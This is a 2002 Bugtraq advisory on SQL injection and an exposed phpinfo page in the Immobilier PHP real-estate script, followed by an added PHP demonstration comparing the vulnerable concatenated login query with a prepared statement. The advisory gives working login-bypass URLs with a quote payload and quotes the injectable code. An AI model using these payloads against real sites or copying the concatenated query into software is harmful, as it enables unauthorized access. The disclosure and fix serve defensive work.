[27999] in bugtraq
Immobilier 1 (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Nov 26 04:50:18 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 25 Nov 2002 17:33:24 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F113rv8L5dBKlrWJ3fv0000170c@hotmail.com>
Information :
°°°°°°°°°°°°°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
agentadmin.php :
--------------------------------------------------------------
[...]
} elseif ($agentname != "" OR $current_user != "")
{
    $sql = "SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'";
    $result = mysql_query($sql) or die("Couldn't execute query.");
    $num = mysql_numrows($result);
    if ($num == 1) {
        session_register("agentname");
        session_register("agentpassword");
        [...]
        session_register("current_user");
        session_register("agent");
[...]
--------------------------------------------------------------
admin/phpinfo.php :
-----------
<?
phpinfo();
?>
-----------
Exploits :
°°°°°°°°°°
http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]&agentpasword='%20OR%20''='
http://[target]/admin/phpinfo.php
Solutions :
°°°°°°°°°°°
- Delete /admin/phpinfo.php
- Put these lines :
------------------------------------------
$agentname=addslashes($agentname);
$current_user=addslashes($current_user);
$agentpassword=addslashes($agentpassword);
------------------------------------------
into common.php.
A patch can be found on http://www.phpsecure.org.
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
frog-m@n
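
Added example (not part of the original advisory and not Immobilier code): the concatenated login query from agentadmin.php next to a parameterised version of the same query, both run against a constructed in-memory SQLite table with the quote payload from the Exploits section. The function names, the PDO/SQLite setup and the sample row are assumptions; the advisory's own fix is addslashes(), and prepared statements are shown here as an alternative.

```php
<?php
// Added example; not Immobilier code. Table and column names follow the
// advisory's query. The SQLite database and its single row are constructed.

// The advisory's pattern: request values are pasted into the SQL text.
function login_concat(PDO $db, string $agentname, string $agentpassword): bool
{
    $sql = "SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'";
    return count($db->query($sql)->fetchAll(PDO::FETCH_COLUMN)) === 1;
}

// Hardened form: placeholders keep the values out of the SQL text, so a
// quote in the input cannot end the string literal and alter the WHERE clause.
function login_prepared(PDO $db, string $agentname, string $agentpassword): bool
{
    $stmt = $db->prepare('SELECT id FROM agents WHERE agent = ? AND agentpass = ?');
    $stmt->execute([$agentname, $agentpassword]);
    return count($stmt->fetchAll(PDO::FETCH_COLUMN)) === 1;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE agents (id INTEGER PRIMARY KEY, agent TEXT, agentpass TEXT)');
$db->exec("INSERT INTO agents (agent, agentpass) VALUES ('alice', 'constructed-pass')");

// Decoded form of the query-string value shown under "Exploits".
$payload = "' OR ''='";

$cases = [
    'valid credentials' => ['alice', 'constructed-pass'],
    'wrong password'    => ['alice', 'nope'],
    'advisory payload'  => [$payload, $payload],
];
foreach ($cases as $label => [$name, $pass]) {
    printf("%-18s concat=%-5s prepared=%s\n", $label,
        var_export(login_concat($db, $name, $pass), true),
        var_export(login_prepared($db, $name, $pass), true));
}
```

Both functions agree on the first two cases; only the concatenated query accepts the payload, because the prepared statement compares it as a literal string against the stored values.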